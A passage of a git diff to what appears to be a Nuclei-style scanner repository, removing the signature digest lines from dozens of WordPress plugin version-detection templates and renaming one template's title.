490a00463044022001351879f35ffbfc616588ba613f89fe1c29cdd3b7c15fa1e2ea72c54a24643d02202cb7ae5dae42c0b5df3123d7434b21e3de3e119aada7ccc4fceadde9bb210dca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1b097379e1..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205853bfafab9bc4ce91db030acbc31bc432172c03ec7724a027319325b4903e8802207c34979e24a8e94ab7bd37594da35c8bb1fee8f8d631afb7947e2ad91e66d787:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 544818b072..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a721fd9533d038a6f2cdcc70cb90b4ef5284c9051866fb9f2bda451d27079bdb022100a1974f14bf5112214149d1a3aead9f9e1943367d19ed377a509f3bf916007c1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 3a60595b0e..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022025b1b79c11d9c1d05ebebcad7adf413510695b8059975da36d9801f9f815cd3702205c0c54a7309e9c4e359af0b4823e0dbc9b6dc2d57d4e6f06cd80fad5f10208df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 2d9319a746..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c63a8fe7182517e45a40ee901e5f0d075881df55786afa73b2060d4874c8917002204843b014cafede43460ab142e2b774a82ca06d41891b4927bf29a0a5f009d682:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index af36497997..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220598a4b568a391728619b731cb348216873a586ad30dbaf54195a741154f1d1ac022100d03389b3c000e3c112e112861bcc9f9df0b35b2a10b7b50815ef0b43c94b9ad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index fab20e5b6a..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210087f605093b6a11a128e16f4ed25eab0a7a03b68fbb846132f6766cb35774519402200877160a9cf7d0abd9953b634c945859508bd6ca830a7b1eb6eff439a9e33a84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index ed9b98966a..45260ccfba 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -1,7 +1,7 @@ id: wordpress-google-listings-and-ads info: - name: Google Listings & Ads Detection + name: Google for WooCommerce Detection author: ricardomaia severity: info reference: @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009004c80984e3f18d57a940ede6d5aee63fef3a352398452a0b127a4e458e7a3f022100e37f1f4ed4a88c06927810f8459b6d98b4c42b469d1e321fd0ca7918df62b0ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 17bfd4c5c5..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100833ff19b9930d0f8c9f206e50843dff7862a23d814f2577f3b09d3084a7ee70a02207bf5566f22d1ae0516df07e88eb47d4d4d22b3b2a0af1d320b355ac68970397b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index ab84ed3c69..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d905fc7ab715040289a6e6516f734706fbb19a1a8b5c32d10e5d481514ca7e99022100de6ff64997091ef385eba7e1b2f88387204504c869a5d93994f222d99af87013:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 93c09a7274..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220685907c041d24bb47b1397f231f8b74facea73a0915fa05d7b8ec150fb14cb0f022100fb8cbec5865a6190bc049324679df8c8fc0961b462942b058fa2dfc3fc4a932d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 15db0a0ea5..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022073965b5a62d36c00a65166954f32d93eb10b8ebf8a3e0fc541fe71b5558733e4022100b2fe7426281d2ea9f594334cd3087de5d48892feb27f1253dfa2a4c4d558b172:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 9e4e6ab046..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000a0b2ca7d1d4b5f9c8f6f8ea2c09291f86ad718c6ad37198ec48a2279b007da0221008f23686fb62adebaa6ccb4e85e67463b9b30ffcece5e788b197be1e61dc1d902:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 8cc2b28970..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203f43527e2330cee2af1ad97a41689d5d27d8996680f626a623e6b2fb1c82b4aa022008b443a277469d585425d5a381417922748510213dde4c834680e0b697f5ad98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 7720890f4a..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cb35ff3426b9a8fd30d49d585f037137b535cfe2a16ade552e397e4e44f1f50a022100a5aafdda77b048e9f628f6820f0340a161cf51fcd31d6b2c63663770a8482e1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index c8ba1dbde2..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d79aaac98682ebf2a3e6c0f8f819a9e9e88897ae856c78bea8f9efba4dbd1775022038917d76887481cf03aabeec2f05735c4433e66f07da33eedbf8c4605dfb961b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index dc55c2ac99..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207d8729c2646d34127745472379934a8fc989c5fe0560399e3034174c2060b8d3022100e75b9fc56d6446f27a9c3aa81cc225d20a679f38003f2045d923bfa689bb1488:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 2b20ee07ed..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e3b2754cbadee3dd5f7e1c2838a0d6619419221e025cdfc994680cd8068524c022100a69b286809d775f512eed8c4ea7c5e2a4f7fa13faf2da6a58bca3d0bb8d49eb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 9c506a02b7..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ab1ceb4a956e9bcb9a72b41d4446208ccc9b2a96fa0e30611bded45c2f20b279022021b361df6e0433ca4cd6674001ddbe5bcdc21239c82cbc9a597ad279bcf4f3f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 39337323af..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220208540394e8b59ac398ff3c49e91aeaf26a989f52d29434ad298a259254c4e2d022100e6f80dcc1f5e93ca4be6716b7e3fdacbdc119c820534b09dc667603098350219:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 52bd19e31d..fea9594fa0 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e0c76c0ea35df5a58c7e147b74c1796f2ba9c39a66a4e4c587729c0e220f6c502205d72bd34b12e35eee2b7a279bde1dc23cc5891a00edf575e333593380ac1194a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index a2124fc30d..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aa4040da4c1aa871e70dd9602c055cf7d755d1c6fba0d05ae8d8bdaa6573a068022100962e7fd88f63099ce02ee4c2651b7f7863cc3e32be16cdee93d72ce8cad24ff9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 06bcf9ea59..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210089bc58bc4129ce6bdb78dc9d38d3ce7fee1658c7d23f13ec65ea4f75d2eeffbc02202c4f1d0850fc0ef3e9bfbdb28f24e04342ab94c71fc4dcea62e3046979e465df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 001b07a21d..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206e780a16126f9f43592d550e52a8eb7eaed53f8a98a986edba66aa92b02e3b9b022100eb9b180a935869cd40fa26f1c708787969b70b8f50bd5497337970fa35507f97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 64ec4d3c59..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d28b207cf3fc9424019480527fb8ff919c41a6d374483392ce1aeea10b7d16bf022019a214f0de7fcb5d692bef02d7145c764fe44235d596e28cd72d4a220e42ce30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 4fc8928424..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a49bf9c11bb4d02e87918909aa06c5decd148f64f415c61965ca5430bd359be00221009e30a15356ef267087edecbf84b7add8133a16808905cf82a64291309fdd6480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 10714c55c2..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022034a119cfe0bacb0ed488c3e60106439242fd4d7625bfd6c170973bd2a9c06f2a0220083874feb12afd52670ca093350dae4c9ad6f98e6da3484dc8dbbca826e285a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index ad8d521217..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e963f7bdae29ff13464d2c8a5028c7ed4d8b63709739ac33461760dee4acef8002205d4046947b24660697e447ddce947c4756628c45883b13cca38829ddbbdfc2a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 0ecfdff6d1..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e6fc045d4684f2dad2714253358455631ca5b6a9e14757ec18529d0214a7a6a1022100e861870b0d1cd207a82b434fdb93cbf56ad237f54184500af42e3cc78db048bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 7ea1d9b3df..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c6cf227382940b5b666d68a8a46a1c58ae691db1d9d25a88863837ef6acaaf4c022038fa14e06b4234b2e318b3cb9d4f21b60415cab490468ad9c2d657f9a210501e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 4a6ec169a0..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df3da4544cd710227e0f280f86e481734adce69e5accfedbea9dbc54539531e3022100c35420ed5a0f819e6cc75b15dddbff8ce7c2feeb3f59148606f30ee91b048729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 45f93f5b39..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100df9cf2e61ea3fe77340086a8b66b9e0f77b9f508c65365690921dbac2b7877cc022100bbaf949b6c9ed5e00fa8a5081ef62b8151f9d1e5fc8a8fa9d87983404656bd4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index b68a177fd2..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220300e6bb539dcffc109522057f2a3b40531ff80ae015efa7b151253f3c74102ce022100c522cafd8d091b031c81b569fbb981b790db3d58e9b7a5ca5e31c0fb8ec80d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 812ee32444..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220468fa266edea85db7a70ab0b7c5d86f26b57edab981cf57e66eb73f043c08d0e022100d74306187c73e31b135b2cc47874e111f004f575825cdadcf36aae575734be0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index c156208109..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100851a7260a4c6753991ffbcb33a1431e0ce4b8907b957a26aaa1f1cf3052b6c3502205c344d14979d829c8553ce4d28542717a74e46a07c0f0daf35499d5e484d784b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 946f1bf644..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f4fc2c5f24d72168f55a31cff8d8b9594ad7663cd3bc421fbcb93c3476c6caea022100dea326751adb4e6d3abe894e3d79bda4bec7bafdc83683f15ab10ddede0ec9f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 40c1524b3c..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022036db9591e29a535ef04f3548da895cc45836f88a8a3195700ad91fc1064025d202201b3911825886b8f2f690a2287a9b6ccc2197c1ee3dabcfc4bce6387cd0584789:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 4b81e74e7b..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210093d462a0b147b0bab5152fc32b9aae1d168457a3dae551d0a1a5dee91498567002204357fdc754e3b8c436670a58862b3add8a5b44ca505e8201596c464dd840c3b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 79f301b983..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100be3ee4d35774f7e10c0db31f63130077110f5a1ea7420f8239e413519b052b23022100d546b60bee135974e4b504a60ea12c38d988b9fffe19f3f17993b35b7daa09ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 8878deeccf..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022030d115c65d797474c35d12372a54a1e110a625c201a92e2f81c813d67d07c06102206c06db3210136e6e2d9687d520e571575f901251829009fef697d42afa803662:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index e96dc2f0e4..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c8210ce244cdb635b2ab15c81d78ddccf7582f992312bf1cc561880ea0b09aaf02203650ff85bccd575132454977b02b05bc824b2a7a15185c083619cc9b2466af6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 49a933db44..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022015892a496e91c25c5b63fad21778b6ce754f5f74e2a0a6a05f10b3459b542104022030ef6d4dca14ed222448fb059e51853a268d20a893c637e1a7a9fd94870b3eee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1b4d8330f8..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204e972da5a44d8ddac8283c06e402720a01ed2dbe70f546e83dc5a183d7be29cb022075a929fa441691cea6567e8e2a9dfc0e5465c0faf92be5a2e4877f5337794870:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 2711a7b035..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220356c502cb16c811005a6dd7aa3b5c7ddaa668e0b714c963f3dc8e6412c4b5c8e0221008eda17e4638752552407f8161cc9068a9d9b18a89d48b077c6b1a3230ac283b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 1cf614018c..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ebdc6fd7d6759f4e5afe78142e0538dfe72c1cbf7d14750ca0bfd37a479845e80220740eda6c00f92e9f811e9cfecba04bbce9bc59a31eb8d4d9981a68b160605f83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 1bf755bdb3..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207d268a730484c1521b8e66e1f873ae965f0d2114fbf47a7a3bea2eca057c6fd702201368a370820cfd942b73b574979ed0500982c2980c1e8cabcec343654df32ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bfefbc5e4a..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd2b35ea721f4780a2364ed7190d7a13cd9ccbdaa5342f3626fa9602c5f1330d022006931f04038baf75adf342cb646a12e64e611bfc68465ad2e42dcf482d1df652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7d6ed18c6f..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 